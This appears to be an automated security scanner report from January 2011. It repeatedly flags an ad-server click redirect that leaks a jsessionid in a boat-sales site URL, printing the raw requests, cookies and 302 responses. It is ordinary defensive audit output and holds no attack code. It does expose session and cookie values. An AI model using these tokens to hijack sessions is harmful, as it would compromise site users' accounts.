The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202068108/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:53 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121005439/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121005439/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:34 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1220615232/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1220615232/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1239223334/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1239223334/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1297608231/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1297608231/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1304908327/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1304908327/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1379666529/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1379666529/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1392092493/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1392092493/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1417680846/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1417680846/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1442210960/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1442210960/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486045072/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486045072/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1673101093/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1673101093/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1686621276/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1686621276/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:38:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1741696931/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1741696931/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1767100923/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1767100923/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790286706/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790286706/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1798360227/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

